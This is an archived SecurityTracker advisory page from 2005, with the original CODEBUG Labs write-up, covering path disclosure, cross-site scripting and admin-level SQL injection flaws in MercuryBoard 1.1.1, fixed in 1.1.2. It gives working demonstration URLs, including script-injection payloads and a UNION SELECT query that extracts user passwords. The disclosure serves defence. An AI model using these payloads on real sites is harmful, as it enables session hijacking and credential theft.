SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Forum/Board/Portal)  >   MercuryBoard Vendors:   mercuryboard.com
MercuryBoard Discloses Path to Remote Users and Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1012984
SecurityTracker URL:  http://securitytracker.com/id/1012984
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 25 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.1.1
Description:   Several vulnerabilities were reported in MercuryBoard. A remote user can conduct cross-site scripting attacks and determine the installation path.

CODEBUG Labs reported that the 'func/pm.php' script does not properly validate the user-supplied 's' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the MercuryBoard software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?a=pm&s='><script>alert(document.cookie)</script>

The 'func/members.php' function does not properly validate user-supplied input in the 'l' parameter, allowing cross-site scripting attacks. A demonstration exploit URL is provided:

http://[target]/index.php?a=members&l='><script>alert(document.cookie)</script>

Some other functions and parameters are affected, as shown in the following demonstration exploit URLs:

http://[target]/index.php?a='><script>alert(document.cookie)</script>
http://[target]/index.php?a=post&s='><script>alert(document.cookie)</script>
http://[target]/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>
http://[target]/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>
http://[target]/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>
http://[target]/index.php?a=cp&s='><script>alert(document.cookie)</script>

A remote user can determine the installation path due to input validation flaws in 'global.php'. A demonstration exploit URL is provided:

http://[target]/index.php?a=forum&f=2&min=0&n=0

The following files are also affected:

lib/jpgraph/jpgraph_bar.php
lib/jpgraph/jpgraph_log.php
lib/jpgraph/jpgraph_polar.php
admincp/admin.php

All of the scripts in the 'func' directory are also affected.

A remote authenticated administrator can supply a specially crafted URL to inject SQL commands. A demonstration exploit URL is provided:

http://[target]/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*
Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the MercuryBoard software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

A remote authenticated administrator can execute SQL commands on the underlying database.
Solution:   The vendor has released a fixed version (1.1.2), available at:

http://www.mercuryboard.com/index.php?a=downloads
Vendor URL:  www.mercuryboard.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Mon, 24 Jan 2005 22:37:47 +0100
Subject:  Multiple vulnerabilities in MercuryBoard 1.1.1


*************************************************************
* CODEBUG Labs
* Advisory #7
* Title: Multiple vulnerabilities in MercuryBoard 1.1.1
* Author: Alberto Trivero
* English Version: Alberto Trivero
* Product: MercuryBoard 1.1.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
*************************************************************


--) Software Page (www.mercuryboard.com)

"MercuryBoard is a powerful message board system dedicated to raw speed with
a mixture of
features, ease of use, and ease of customization coupled with expandability,
and diverse
language services." Note that is write in PHP OOP.


--) Full Path Disclosure

Let's look at original code from global.php line 604:

<?
    ...
    // some base variables
    $current = ceil($min / $num);
    $string  = null;
    $pages   = ceil($rows / $num);
    $end     = ($pages - 1) * $num;
    ...
?>

As we can see there isn't a control to $num and so if we simply assign to
$num the value 0
(or a not numerical argument), there will be an impossible division by zero
that show the
full path:

    http://www.sitewithmercuryboard.com/index.php?a=forum&f=2&min=0&n=0

Other Full Path Disclosure:

    http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_bar.php
    http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_log.php
    http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_polar.php
    http://www.sitewithmercuryboard.com/admincp/admin.php
    http://www.sitewithmercuryboard.com/func/[file] <--- All the PHP file in
the dyrectory:
                                             active.php board.php
constants.php cp.php
                                             debug.php email.php forum.php
help.php login.php
                                             members.php mod.php pm.php
post.php printer.php
                                             profile.php register.php
search.php topic.php


--) Cross-Site Scripting (XSS)

Let's look at original code from /func/pm.php line 36:

<?
    ...
    if (!isset($this->get['s'])) {
      $this->get['s'] = null;
    }
    switch($this->get['s'])
    {
    case 'send':
      return $this->send();
      break;
    case 'view':
      return $this->view();
      break;
    case 'delete':
      return $this->delete_pm();
      break;
    case 'clear':
      return $this->clear();
      break;
    default:
      return $this->folder();
      break;
    }
    ...
?>

As we can see there is a switch/case cycle to get 's' but in this cycle
there isn't any
check if we put other parameter with 's', like this XSS code:


http://www.sitewithmercuryboard.com/index.php?a=pm&s='><script>alert(document.cookie)</script>

Let's look again at original code from /func/members.php line 35:

<?
    ...
    if (!isset($this->get['l'])) {
      $this->get['l'] = null;
    } else {
      $this->get['l'] = strtoupper($this->get['l']);
    }
    ...
?>

As we can see, also in this case, there isn't parsing methods for the
processing of 'l',
so nothing can prevent us from doing an XSS attack:


http://www.sitewithmercuryboard.com/index.php?a=members&l='><script>alert(document.cookie)</script>

Other Cross-Site Scripting:


http://www.sitewithmercuryboard.com/index.php?a='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=cp&s='><script>alert(document.cookie)</script>


--) SQL Injection

For the same reason because it's possible to execute the XSS codes described
before, it's
also possible to do SQL Injection attacks. But in this case it's a
non-critical bug, why?
Because we need first login as forum administrator to make successful
attack. For example:


http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*

With the URL before we get, for the just described reason, an error like
this (verified
only on MercuryBoard 1.1.0):

    The used SELECT statements have a different number of columns


--) Patch

After the report to developer of the board of these bugs, they released the
version 1.1.2
of MercuryBoard that correct them:
http://www.mercuryboard.com/index.php?a=downloads


*************************************************************
        http://www.codebug.org
*************************************************************


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC